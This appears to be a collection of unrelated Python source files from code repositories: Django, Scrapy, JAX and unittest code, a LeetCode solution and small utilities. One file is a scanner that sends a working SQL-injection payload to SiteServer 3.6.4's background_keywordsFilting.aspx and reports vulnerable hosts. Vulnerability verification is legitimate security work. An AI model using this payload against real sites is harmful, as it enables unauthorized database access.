    )

    # Central angle, converted back to degrees ...
    return math.degrees(2.0 * math.asin(half_chord))
|
[
"t.m.guymer@thomasguymer.co.uk"
] |
t.m.guymer@thomasguymer.co.uk
|
6f659c63d644601207b26f69956c91a1acf67b0c
|
8734446b29c3424e25ef82c3ba65db61f1736a12
|
/prngmgr/migrations/0007_auto_20161008_1643.py
|
1ea7a65c037d1ef783856208172d4c2c0bbe84f8
|
[
"Apache-2.0"
] |
permissive
|
decolnz/prngmgr
|
25ef02a3c76c00864009c6470d532805a5b52af3
|
6ea19e0095c123d337e523f3c832f5688254c7f1
|
refs/heads/master
| 2021-01-19T00:51:26.798203
| 2016-10-11T09:16:04
| 2016-10-11T09:16:04
| 87,213,736
| 1
| 0
| null | 2017-04-04T17:05:25
| 2017-04-04T17:05:25
| null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter `peeringsession.previous_state` to a 12-char CharField."""

    dependencies = [
        ('prngmgr', '0006_auto_20161008_1336'),
    ]

    operations = [
        migrations.AlterField(
            model_name='peeringsession',
            name='previous_state',
            # NOTE(review): the bytes default b'None' is a Python 2 artifact
            # of makemigrations; stores the literal string "None".
            field=models.CharField(default=b'None', max_length=12),
        ),
    ]
|
[
"benm@workonline.co.za"
] |
benm@workonline.co.za
|
5bfde6f4620ebb1cad3fa1035a1c961d7bfff609
|
c25be81a90291c9dd7eed076509729b1c730531e
|
/tests.py
|
93f031029fc25e60902294dba580f390e688262c
|
[
"Apache-2.0"
] |
permissive
|
icYFTL/RTULAB_Service
|
8707b7f9082494e7513c6afc0e4ede89f18cc320
|
a16d0fc2ac9ac103f0a14e90824caded7156bf11
|
refs/heads/main
| 2023-03-18T15:26:56.586261
| 2021-03-18T09:23:30
| 2021-03-18T09:23:30
| 343,216,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,017
|
py
|
import requests
import unittest
class Test(unittest.TestCase):
    """Smoke tests against the live rulab.icyftl.ru deployment.

    NOTE(review): these tests hit a real network service (shop, purchases,
    factory) and so are environment-dependent by design.
    """

    def setUp(self) -> None:
        # Service endpoints and the shared shop admin password.
        self.__host = 'https://rulab.icyftl.ru/'
        self.__purchases_host = self.__host + 'purchases'
        self.__shop_host = self.__host + 'shop'
        self.__factory_host = self.__host + 'factory'
        self.__shop_password = 'lol'

    def test_upstate(self):
        """All three services respond with HTTP 200."""
        try:
            shop_state = requests.get(self.__shop_host).status_code
            purchases_state = requests.get(self.__purchases_host).status_code
            factory_state = requests.get(self.__factory_host).status_code
            self.assertEqual(shop_state, 200)
            self.assertEqual(purchases_state, 200)
            self.assertEqual(factory_state, 200)
        except Exception as e:
            raise AssertionError('Some services are down or something went wrong\n' + str(e))

    def test_create_shop(self):
        """Creating a shop with the admin code returns HTTP 201."""
        try:
            shop = requests.post(self.__shop_host + '/create', json={
                "name": "UTest",
                "address": "UTest",
                "number": "79167031312"
            }, headers={'XXX-CODE': self.__shop_password})
            self.assertEqual(shop.status_code, 201)
        # Bug fix: this was a bare `except:` that also swallowed SystemExit/
        # KeyboardInterrupt and discarded the original error; now it matches
        # the other tests and reports the underlying cause.
        except Exception as e:
            raise AssertionError('Shop service is down or something went wrong\n' + str(e))

    def test_add_items(self):
        """Stocking items into shop 1 returns HTTP 201."""
        try:
            shop = requests.put(self.__shop_host + '/1/add_items', json={
                "items": [
                    {
                        "name": "TestCake",
                        "category": "TestCakes",
                        "count": 100
                    }
                ]
            }, headers={'XXX-CODE': self.__shop_password})
            self.assertEqual(shop.status_code, 201)
        except Exception as e:
            raise AssertionError('Shop service is down or something went wrong\n' + str(e))

    def test_new_purchase(self):
        """Buying an in-stock quantity succeeds (200); over-buying fails (424)."""
        try:
            slots = requests.get(self.__shop_host + '/1/get_slots').json()
            self.assertTrue(any([x['name'] == 'testcake' for x in slots['response']['result']]))
            slots = slots['response']['result']
            slot = None
            for x in slots:
                if x['name'] == 'testcake':
                    slot = x
                    break
            r = requests.post(self.__shop_host + '/1/new_purchase', json={
                "slot_id": slot['id'],
                "count": 1,
                "user_id": 1,
                "method": "card"
            })
            self.assertEqual(r.status_code, 200)
            r = requests.post(self.__shop_host + '/1/new_purchase', json={
                "slot_id": slot['id'],
                "count": 100,
                "user_id": 1,
                "method": "card"
            })
            self.assertEqual(r.status_code, 424)
        except Exception as e:
            raise AssertionError('Shop service is down or something went wrong\n' + str(e))
# Run the suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
[
"savap0@yandex.ru"
] |
savap0@yandex.ru
|
9fda03d01e11adae9c1c4533fc5502a2d6fe71d9
|
ba9e1fc7797ebc55a61a40ee66c51b467f353ff1
|
/web_scraping_with_python_demos/2-cleangrams.py
|
1c489e8f587b8315ebadba2f6d45592f570f395e
|
[] |
no_license
|
sanpianye/the-little-python
|
77c938164d43cbb120063a6d17d0705cc9e92e93
|
c04898bf0812afb53b71567699ee523d1bc56a29
|
refs/heads/master
| 2021-06-14T01:55:31.452777
| 2017-03-09T13:31:59
| 2017-03-09T13:31:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,860
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
''''''
__author__ = 'Engine'
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
import string
from collections import OrderedDict
def cleanInput(input):
    """Normalise raw article text into a list of clean words.

    Steps: collapse newlines and repeated spaces, strip Wikipedia citation
    markers like [1], drop non-ASCII characters, trim punctuation from each
    token, and discard single characters other than 'a'/'i'.
    """
    text = re.sub("\n+", " ", input)       # fold newline runs into one space
    text = re.sub("\[[0-9]*\]", "", text)  # remove citation markers, e.g. [1]
    text = re.sub(" +", " ", text)         # squeeze space runs to one space
    # Round-trip UTF-8 -> ASCII to silently discard non-ASCII characters.
    text = bytes(text, "UTF-8").decode("ascii", "ignore")
    words = []
    for token in text.split(' '):
        # Trim surrounding punctuation (admittedly heavy-handed).
        token = token.strip(string.punctuation)
        # Keep multi-character tokens, plus the words 'a' and 'i'.
        if len(token) > 1 or token.lower() in ('a', 'i'):
            words.append(token)
    return words
def getNgrams(input, n):
    """Return a dict mapping each n-gram of `input` to its frequency.

    `input` is raw text; it is cleaned via cleanInput(), then every run of
    `n` adjacent words (joined by single spaces) is counted.
    """
    words = cleanInput(input)  # data cleaning
    counts = dict()
    for start in range(len(words) - n + 1):
        gram = ' '.join(words[start:start + n])
        # tally this n-gram
        counts[gram] = counts.get(gram, 0) + 1
    return counts
request = "http://en.wikipedia.org/wiki/Python_(programming_language)"
response = urlopen(request)
bsObj = BeautifulSoup(response)
# Extract the main body text of the article
input = bsObj.find("div", {"id": "mw-content-text"}).get_text() # str
ngrams = getNgrams(input, 2) # collect 2-grams
# Sort the n-grams by frequency, most common first
ngrams = OrderedDict(sorted(ngrams.items(), key=lambda t: t[1], reverse=True))
print(ngrams)
|
[
"enginechen07@gmail.com"
] |
enginechen07@gmail.com
|
070b67571830fbc22ce4702fded26ee0e03f646a
|
6d7c488d14cf2bc0322c955a53ec34cfd67e8c3b
|
/.history/plane_ticket/spiders/ticket_spider_20200709002008.py
|
9258ec92ad4166dbf5107784494df0a8a3454021
|
[] |
no_license
|
byebyeyuchi/getPlaneTicket-web-crawl-
|
e247b7d015e35d1036e023c748764abb0ad66fe1
|
91a666659a537c053d8cd19c8214a54eab460800
|
refs/heads/main
| 2023-02-25T21:43:53.046865
| 2021-01-30T02:14:43
| 2021-01-30T02:14:43
| 334,308,704
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
import scrapy
class TicketSpider(scrapy.Spider):
    """Spider that fetches the consulate news listing page.

    NOTE(review): work-in-progress file from .history; parse() does not yet
    extract anything useful from the selected <li> nodes.
    """
    name = "tickets"

    def start_requests(self):
        urls = [
            "http://montreal.chineseconsulate.org/chn/zlgxw/"
        ]
        # Bug fix: the original built `urls` but never issued a request,
        # so parse() was never invoked. Yield one Request per URL.
        for url in urls:
            yield scrapy.Request(url=url, callback=self.parse)

    def parse(self, response):
        # Bug fix: the original chained a trailing `.css()` with no selector,
        # which raises TypeError in Scrapy. Keep the SelectorList directly.
        all = response.css('.Text_Center li')
|
[
"delseylyq@gmail.com"
] |
delseylyq@gmail.com
|
9c0565a7a799b4d983060bea22a4462692fd3731
|
2b0eab74af8d23244ff11699830f9bb10fbd717a
|
/helpers/mixins/store_data_with_default_value_by_key.py
|
e418e8fb8cbcfde82dbe0fe1b92fbd4096f04bed
|
[] |
no_license
|
alexandrenorman/mixeur
|
c7e25cd20b03c78b361cb40e3e359a6dc5d9b06b
|
95d21cd6036a99c5f399b700a5426e9e2e17e878
|
refs/heads/main
| 2023-03-13T23:50:11.800627
| 2021-03-07T15:49:15
| 2021-03-07T15:49:15
| 345,384,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,174
|
py
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
from django.db import models
from django.core.exceptions import ValidationError
from core.models import MixeurBaseModel
class StoreDataWithDefaultValueByKey(MixeurBaseModel):
    """
    Mixin for storing value with a unique default value for all
    and a unique default value for each item associated by key

    NOTE(review): concrete subclasses are expected to declare a `key`
    field -- this abstract model reads self.key and filters on key=...
    but does not define it here; confirm against the subclasses.
    """

    class Meta:
        abstract = True
        ordering = ("created_at",)

    # True for rows that act as a default: generic when key is None,
    # per-key otherwise.
    is_default_value = models.BooleanField(
        _("est une valeur par défaut"), default=False
    )

    @classmethod
    def default_value(cls, key=None):
        """
        Return default value which is:
        - default value for the key if exists
        - else generic default value if exists
        - else None
        """
        if key:
            if cls.objects.filter(key=key).exists():
                return cls.objects.filter(key=key).first()

        # Fall back to the generic (key-less) default, if any.
        if cls.objects.filter(key=None).exists():
            return cls.objects.filter(key=None).first()

        return None

    def clean(self):
        """
        verify that:
        - an unique value exists without a key
        - an unique value exists with a key
        """
        if self.is_default_value:
            # At most one generic default (key is None) may exist;
            # exclude self so updating an existing row validates.
            if (
                self.key is None
                and self.__class__.objects.exclude(pk=self.pk)
                .filter(key=None, is_default_value=True)
                .exists()
            ):
                raise ValidationError(
                    "Une seule valeur par défaut générique est possible"
                )

            # At most one default per key may exist.
            if (
                self.key is not None
                and self.__class__.objects.exclude(pk=self.pk)
                .filter(key=self.key, is_default_value=True)
                .exists()
            ):
                raise ValidationError(
                    "Une seule valeur par défaut par clef est possible"
                )
        else:
            # Non-default values must always be attached to a key.
            if self.key is None:
                raise ValidationError(
                    "Une valeur non générique doit être associée à une clef"
                )

        return super().clean()
|
[
"norman@xael.org"
] |
norman@xael.org
|
42ce348fe55b62181045120eb229a2509121b694
|
86f2eb787624e293be660fa97f6bbb35980f2e29
|
/translate-app-tkinter/app/utils/thread.py
|
11fc4e975c3224a345df30657371cadb3b9e9957
|
[
"MIT"
] |
permissive
|
jadsonlucio/holidays-projects
|
73e762b7d5669b8850f3fcecf59aa152430c2d19
|
136992f499d37640decf67072280ae87b83fe830
|
refs/heads/master
| 2023-05-09T03:55:24.433421
| 2020-10-27T13:13:01
| 2020-10-27T13:13:01
| 256,420,473
| 2
| 0
| null | 2021-06-02T01:30:37
| 2020-04-17T06:26:05
|
Python
|
UTF-8
|
Python
| false
| false
| 273
|
py
|
from threading import Thread
from functools import wraps
def run_async(func):
    """Decorator that executes the wrapped callable on a fresh thread.

    Calling the decorated function returns immediately with the started
    `threading.Thread`; callers may `join()` it to wait for completion.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        worker = Thread(target=func, args=args, kwargs=kwargs)
        worker.start()
        return worker
    return wrapper
|
[
"jadsonaluno@hotmail.com"
] |
jadsonaluno@hotmail.com
|
bbb837d0aac28477a37baa05d3dd3c36167bc5b7
|
8b59108f621e94935b3b72aae3c441e10cb64a1c
|
/create_uneeded_icons.py
|
cdb3dda6906313546c12ebd032e4aa2accfd9755
|
[] |
no_license
|
CyberSys/CE_Python
|
97a373b1fe2d214ae854d454dc5e7d79bc150d8e
|
721ac005e215f1225fb3c99491b55dc48b19ab30
|
refs/heads/master
| 2022-01-13T08:04:08.558594
| 2019-07-22T17:05:46
| 2019-07-22T17:05:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,542
|
py
|
from shutil import copyfile
import os
if __name__ == "__main__":
    # Blank out a batch of obsolete inventory icons by copying the generic
    # "no icon" placeholder over each of them, so stale art no longer shows
    # up in the in-game UI.  Paths are hard-coded to the local Perforce
    # workspace layout.
    icon_dir = "D:/perforce/dev/GameSDK/Libs/UI/Inventory/item_images"
    placeholder = os.path.normpath(os.path.join(icon_dir, "no_icon_48.png"))
    uneeded_icons = [
        "AssaultScope_48.png",
        "ATButtstockTS_48.png",
        "ATFrontsightTS_48.png",
        "ATHandguardARS_48.png",
        "ExtendedClip_48.png",
        "FlashlightAcc_48.png",
        "Ironsight_48.png",
        "NewSilencer_48.png",
        "NoAttachmentBarrel_48.png",
        "NoAttachmentBottom_48.png",
        "Scope12x_48.png",
        "ammo_12_gauge_pellet_48.png",
        "ammo_12_gauge_slug_48.png",
        "ammo_22_48.png",
        "ammo_223_48.png",
        "ammo_308_48.png",
        "ammo_357_48.png",
        "ammo_5_56x45_48.png",
        "ammo_7_62x51_48.png",
        "ammo_9mm_48.png",
        "ammo_acp_45_48.png",
        "Arrow_0000_48.png",
        "Arrow_000P_48.png",
        "Arrow_00R0_48.png",
        "Arrow_00RP_48.png",
        "Arrow_0B00_48.png",
        "Arrow_0B0P_48.png",
        "Arrow_0BR0_48.png",
        "Arrow_0BRP_48.png",
        "Arrow_F000_48.png",
        "Bolt_0000_48.png",
        "Bolt_000P_48.png",
        "Bolt_00R0_48.png",
        "Bolt_00RP_48.png",
        "Bolt_0B00_48.png",
        "Bolt_0B0P_48.png",
        "Bolt_0BR0_48.png",
        "Bolt_0BRP_48.png",
        "Bolt_F000_48.png",
        "ChemlightBlue_48.png",
        "ChemlightGreen_48.png",
        "ChemlightRed_48.png",
        "ChemlightWhite_48.png",
        "ChemlightYellow_48.png",
        "Flare_48.png",  # FIX: was "Flare_48" -- missing the .png extension
        "Flashbang_48.png",
        "GrenadeBottle_48.png",
        "GrenadeMolotov_48.png",
        "GrenadeSmokeGreen_48.png",
        "GrenadeSmokeMagenta_48.png",
        "GrenadeSmokeRed_48.png",
        "GrenadeSmokeWhite_48.png",
        "GrenadeSmokeYellow_48.png",
        "Pipebomb_48.png",
        "animated_search_light_48.png",
        "entity_test_48.png",
        "entity_test_packed_48.png",
        "PlotSign_48.png",
        "powered_flood_light_48.png",
        "tire_single_48.png",
        "DieselGenerator_48.png",
        "WaterPurifictionTablets_48.png",
        "CampingTentBlue_48.png",
        "CampingTentBrown_48.png",
        "CampingTentGreen_48.png",
        "CampingTentOrange_48.png",
        "CampingTentPurple_48.png",
        "CampingTentRed_48.png",
        "CampingTentYellow_48.png",
        "PackedCampingTent_48.png",
        "PackedTrekkingTent_48.png",
        "PupTentBlue_48.png",
        "PupTentBrown_48.png",
        "PupTentGreen_48.png",
        "PupTentRed_48.png",
        "PupTentTan_48.png",
        "TrekkingTentBlue_48.png",
        "TrekkingTentBrown_48.png",
        "TrekkingTentGreen_48.png",
        "TrekkingTentOrange_48.png",
        "TrekkingTentPurple_48.png",
        "TrekkingTentRed_48.png",
        "TrekkingTentYellow_48.png",
        "TwoPersonTentBlue_48.png",
        "TwoPersonTentBrown_48.png",
        "TwoPersonTentGreen_48.png",
        "TwoPersonTentOrange_48.png",
        "TwoPersonTentPurple_48.png",
        "TwoPersonTentRed_48.png",
        "TwoPersonTentYellow_48.png",
        "FlashbangPickup_48.png",
        "Binoculars_48.png",
        "DebugPistol_48.png",
        "NoWeapon_48.png",
        "PickAndThrowWeapon_48.png",
    ]
    for icon in uneeded_icons:
        # copyfile overwrites the destination icon if it already exists.
        copyfile(placeholder, os.path.join(icon_dir, icon))
|
[
"chrissprance@gmail.com"
] |
chrissprance@gmail.com
|
634db64fad5672d244b9dde45ed05c57dca1210d
|
a1b21aa9b4c3b99b9b16fd47686bcc76e6fafd18
|
/unit_test/function_test/test_name_function.py
|
9852039917d53af0689e6cada925c25852cced60
|
[] |
no_license
|
irfan87/python_tutorial
|
986c5dae98a5ad928c3820bf0355f544c091caf0
|
71bbf8b8aba2d5a1fafc56b8cb15d471c428a0cf
|
refs/heads/master
| 2020-06-05T00:52:07.619489
| 2019-08-19T02:56:41
| 2019-08-19T02:56:41
| 192,257,432
| 0
| 0
| null | 2019-08-19T02:56:42
| 2019-06-17T01:53:46
|
Python
|
UTF-8
|
Python
| false
| false
| 643
|
py
|
import unittest
from name_function import get_formatted_name
class NamesTestCase(unittest.TestCase):
    """Unit tests for get_formatted_name() from name_function.py."""

    def test_first_last_name(self):
        """Two-part names such as 'Janis Joplin' are title-cased."""
        self.assertEqual(get_formatted_name('janis', 'joplin'),
                         'Janis Joplin')

    def test_first_last_middle_name(self):
        """Three-part names such as 'Wolfgang Amadeus Mozart' work too."""
        self.assertEqual(
            get_formatted_name('wolfgang', 'mozart', 'amadeus'),
            'Wolfgang Amadeus Mozart')


if __name__ == '__main__':
    unittest.main()
|
[
"nerve2009@yahoo.com"
] |
nerve2009@yahoo.com
|
ed7aeccf50b61c1ede46b34c971ecbf6fac49f40
|
90baf1f6abb0dcba147f46105347a7d81f0ed617
|
/472-concatenated-words/472-concatenated-words.py
|
1541cd05cdd590100ef56d987a207bccb9cf9176
|
[] |
no_license
|
vinija/LeetCode
|
c2bfbd78711b2ebedcfd4f834d12fde56a15b460
|
de2727f1cc52ce08a06d63cff77b6ef6bb9d2528
|
refs/heads/master
| 2022-09-29T06:16:44.465457
| 2022-08-21T05:20:45
| 2022-08-21T05:20:45
| 97,401,204
| 116
| 32
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 830
|
py
|
# ORIGINAL POST WITH EXPLANATION: https://leetcode.com/problems/concatenated-words/discuss/871866/Easyway-Explanation-every-step
class Solution(object):
    def findAllConcatenatedWordsInADict(self, words):
        """Return the words that are concatenations of >= 2 other words
        from the same list, preserving input order.

        Adds memoization over the original version: without it, repeated
        suffixes make the DFS exponential in the worst case.

        :type words: List[str]
        :rtype: List[str]
        """
        d = set(words)
        memo = {}  # word -> can it be split into >= 2 dictionary words?

        def dfs(word):
            if word in memo:
                return memo[word]
            result = False
            # Try every proper split; both halves are strictly shorter
            # than `word`, so a word never matches itself here.
            for i in range(1, len(word)):
                prefix, suffix = word[:i], word[i:]
                if prefix in d and (suffix in d or dfs(suffix)):
                    result = True
                    break
            memo[word] = result
            return result

        return [word for word in words if dfs(word)]
|
[
"vinija@gmail.com"
] |
vinija@gmail.com
|
09350b78ae65b299217cbd7c1567d5543b66ea37
|
37a119f116431ef91f1257370a5cd4a992b018db
|
/tests/sql/test_expressions.py
|
123319ebd94792d6d470655ae8be31eb2e22416f
|
[
"ISC"
] |
permissive
|
uranusjr/sqlian
|
660e66d4c5c01b1112961f4097e95143c15cf72a
|
8f029e91af032e23ebb95cb599aa7267ebe75e05
|
refs/heads/master
| 2021-01-19T18:59:19.349318
| 2017-09-12T13:12:10
| 2017-09-12T13:12:10
| 101,176,270
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 903
|
py
|
from sqlian import Sql
from sqlian.standard import expressions as e
def test_identifier(engine):
    """A bare identifier renders with double-quote quoting."""
    sql = e.Identifier('foo')
    assert sql.__sql__(engine) == Sql('"foo"'), sql
def test_identifier_qualified(engine):
    """A qualified identifier joins its parts with a dot, each quoted."""
    sql = e.Identifier('foo', 'bar')
    assert sql.__sql__(engine) == Sql('"foo"."bar"'), sql
def test_is_null(engine):
    """Equality against None renders as IS NULL, not '= NULL'."""
    sql = e.Equal(e.Identifier('foo'), None)
    assert sql.__sql__(engine) == Sql('"foo" IS NULL'), sql
def test_is_not_null(engine):
    """Inequality against None renders as IS NOT NULL."""
    sql = e.NotEqual(e.Identifier('foo'), None)
    assert sql.__sql__(engine) == Sql('"foo" IS NOT NULL'), sql
def test_equal(engine):
    """Numeric operands render unquoted."""
    sql = e.Equal(e.Identifier('foo', 'bar'), 42)
    assert sql.__sql__(engine) == Sql('"foo"."bar" = 42'), sql
def test_not_equal(engine):
    """String operands render single-quoted."""
    sql = e.NotEqual(e.Identifier('person', 'name'), 'Mosky')
    assert sql.__sql__(engine) == Sql('"person"."name" != ' + "'Mosky'"), sql
|
[
"uranusjr@gmail.com"
] |
uranusjr@gmail.com
|
dd773633d85d0d1d73c0a0a758c4bdebd3107be2
|
6f7ba68d9e2ba6cfc7f07367bcd34a643f863044
|
/cms/siteserver/siteserver_background_keywordsFilting_sqli.py
|
24feed6f2a0c31d35687f1091c3bcc6d3214f82b
|
[] |
no_license
|
deepwebhacker/Dxscan
|
2e803ee01005a1d0a7802290bfb553f99e8fcf2e
|
eace0872e1deb66d53ec7cfc62f4c793f9421901
|
refs/heads/main
| 2023-03-06T10:26:23.371926
| 2021-02-22T14:03:51
| 2021-02-22T14:03:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,719
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: siteserver3.6.4 background_keywordsFilting.aspx注入
referer: http://www.wooyun.org/bugs/wooyun-2013-043641
author: Lucifer
description: 文件/siteserver/bbs/background_keywordsFilting.aspx中,参数Keyword存在SQL注入。
'''
import sys
import requests
import warnings
from termcolor import cprint
class siteserver_background_keywordsFilting_sqli_BaseVerify:
    """Proof-of-concept checker for a SQL injection in SiteServer 3.6.4.

    The injectable parameter is ``Keyword`` in
    /siteserver/bbs/background_keywordsFilting.aspx (WooYun-2013-043641).
    """
    def __init__(self, url):
        # Base URL of the target (scheme + host, no trailing path).
        self.url = url
    def run(self):
        """Send the injection probe and report whether the target responds
        with the marker that proves the payload executed."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # CHAR(66)x3 concatenated with @@VERSION makes a vulnerable server
        # echo "BBBMicrosoft ..." in the response body.
        payload = "/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>0--"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"BBBMicrosoft" in req.text:
                cprint("[+]存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                # Forward the finding to a local collector service.
                postdata = {self.url:"存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl}
                requests.post('http://localhost:8848/cms', json=postdata)
            else:
                cprint("[-]不存在siteserver_background_keywordsFilting_sqli漏洞", "white", "on_grey")
        except:
            # NOTE(review): bare except deliberately keeps a batch scan going
            # past network errors, but it also hides real bugs -- consider
            # narrowing to requests.RequestException.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
    # Usage: python <script> <target-base-url>
    warnings.filterwarnings("ignore")
    testVuln = siteserver_background_keywordsFilting_sqli_BaseVerify(sys.argv[1])
    testVuln.run()
|
[
"noreply@github.com"
] |
deepwebhacker.noreply@github.com
|
98a9f68c969ed0299834aeafe3f5422274954ce7
|
8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f
|
/src/pycrunchbase/resource/news.py
|
67242ca520fe227c4dc5b1285fa4919f577e6495
|
[
"MIT"
] |
permissive
|
ngzhian/pycrunchbase
|
58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808
|
ead7c93a51907141d687da02864a3803d1876499
|
refs/heads/master
| 2023-07-08T06:18:59.314695
| 2023-07-03T13:27:06
| 2023-07-03T13:27:06
| 30,629,033
| 69
| 45
|
MIT
| 2020-12-02T02:26:40
| 2015-02-11T03:39:14
|
Python
|
UTF-8
|
Python
| false
| false
| 734
|
py
|
import six
from .node import Node
from .utils import parse_date
@six.python_2_unicode_compatible
class News(Node):
    """Represents a News on CrunchBase"""

    # Attributes CrunchBase may populate on a News node.
    KNOWN_PROPERTIES = [
        "title",
        "author",
        "posted_on",
        "url",
        "created_at",
        "updated_at",
    ]

    def _coerce_values(self):
        # Only the date-like attribute needs coercion from its raw form.
        raw = getattr(self, 'posted_on', None)
        if raw:
            self.posted_on = parse_date(raw)

    def __str__(self):
        return u'{title} by {author} on {posted_on}'.format(
            title=self.title, author=self.author, posted_on=self.posted_on)

    def __repr__(self):
        return self.__str__()
|
[
"ngzhian@gmail.com"
] |
ngzhian@gmail.com
|
9102954aee63aa1de8128785de2d2f9e90d976f9
|
a79cccacfa422012caac481b5eff80f6e911d0af
|
/jax/experimental/gda_serialization/serialization_test.py
|
cef36c9f56c1553a70bcf8e80935396e0bf0d8b0
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
jblespiau/jax
|
f932fe6df23942756957db61655f6cc9c6d67d64
|
46a666c4489b9e04d2777cf2156453bc48a8e432
|
refs/heads/main
| 2022-04-17T01:50:55.041057
| 2022-04-15T08:49:52
| 2022-04-15T08:49:52
| 481,888,965
| 0
| 0
|
Apache-2.0
| 2022-04-15T08:20:44
| 2022-04-15T08:20:43
| null |
UTF-8
|
Python
| false
| false
| 6,163
|
py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for serialization and deserialization of GDA."""
import pathlib
import unittest
from absl.testing import absltest
import jax
from jax._src import test_util as jtu
from jax._src import util
from jax.config import config
from jax.experimental import PartitionSpec as P
from jax.experimental.global_device_array import GlobalDeviceArray
from jax.experimental.gda_serialization import serialization
from jax.experimental.maps import Mesh
import numpy as np
config.parse_flags_with_absl()
def create_global_mesh(mesh_shape, axis_names):
  """Return a Mesh laid out over the first prod(mesh_shape) local devices.

  Raises unittest.SkipTest when the host exposes too few devices, so the
  calling test is skipped rather than failed.
  """
  size = util.prod(mesh_shape)
  devices = jax.devices()
  if len(devices) < size:
    raise unittest.SkipTest(f'Test requires {size} local devices')
  return Mesh(np.array(devices[:size]).reshape(mesh_shape), axis_names)
class CheckpointTest(jtu.JaxTestCase):
  """Round-trip tests for GDA serialization through tensorstore specs."""
  def test_checkpointing(self):
    """Serialize three GDAs (including an empty one) and read them back,
    checking per-shard contents and dtypes."""
    global_mesh = create_global_mesh((4, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    mesh_axes = P('x', 'y')
    num = util.prod(global_input_shape)
    # First GDA
    global_input_data1 = np.arange(num).reshape(global_input_shape)
    def cb1(index):
      return global_input_data1[index]
    gda1 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
                                           mesh_axes, cb1)
    ckpt_dir1 = pathlib.Path(self.create_tempdir('first').full_path)
    # Second GDA
    global_input_data2 = np.arange(num, num + num).reshape(global_input_shape)
    def cb2(index):
      return global_input_data2[index]
    gda2 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
                                           mesh_axes, cb2)
    ckpt_dir2 = pathlib.Path(self.create_tempdir('second').full_path)
    # Third GDA: zero-length array, fully replicated on a 1-D mesh.
    def cb3(index):
      return np.array([])
    global_mesh1d = create_global_mesh((8,), ('x',))
    gda3 = GlobalDeviceArray.from_callback((0,), global_mesh1d, P(None), cb3)
    ckpt_dir3 = pathlib.Path(self.create_tempdir('third').full_path)
    ckpt_paths = [str(ckpt_dir1), str(ckpt_dir2), str(ckpt_dir3)]
    tspecs = jax.tree_map(serialization.get_tensorstore_spec, ckpt_paths)
    serialization.run_serialization([gda1, gda2, gda3], tspecs)
    # Note gda2 is deserialized with a DIFFERENT partitioning (P('x')),
    # which replicates its columns across the 'y' mesh axis.
    m1, m2, m3 = serialization.run_deserialization(
        [global_mesh, global_mesh, global_mesh1d],
        [mesh_axes, P('x'), P(None)],
        tspecs)
    self.assertArraysEqual(m1.local_shards[0].data.to_py(),
                           np.array([[0], [2]]))
    self.assertArraysEqual(m1.local_shards[1].data.to_py(),
                           np.array([[1], [3]]))
    self.assertEqual(m1.local_shards[0].data.shape, (2, 1))
    self.assertEqual(m1.dtype, np.int32)
    # Both shards see the same values: 'y' is now a replication axis.
    self.assertArraysEqual(m2.local_shards[0].data.to_py(),
                           np.array([[16, 17], [18, 19]]))
    self.assertArraysEqual(m2.local_shards[1].data.to_py(),
                           np.array([[16, 17], [18, 19]]))
    self.assertEqual(m2.local_shards[0].data.shape, (2, 2))
    self.assertEqual(m2.dtype, np.int32)
    for i, s in enumerate(m3.local_shards):
      self.assertEqual(s.index, (slice(None),))
      self.assertEqual(s.replica_id, i)
      self.assertArraysEqual(s.data.to_py(), np.array([]))
    self.assertEqual(m3.dtype, np.float32)
  def test_checkpointing_with_bigger_shape(self):
    """Deserialize into a larger global shape/mesh than was serialized;
    positions beyond the original data are zero-padded."""
    global_mesh = create_global_mesh((2, 2), ('x', 'y'))
    global_input_shape = (8, 2)
    num = util.prod(global_input_shape)
    # First GDA
    global_input_data1 = np.arange(num).reshape(global_input_shape)
    def cb1(index):
      return global_input_data1[index]
    gda1 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
                                           P('x', 'y'), cb1)
    ckpt_dir1 = pathlib.Path(self.create_tempdir('first').full_path)
    ckpt_paths = [str(ckpt_dir1)]
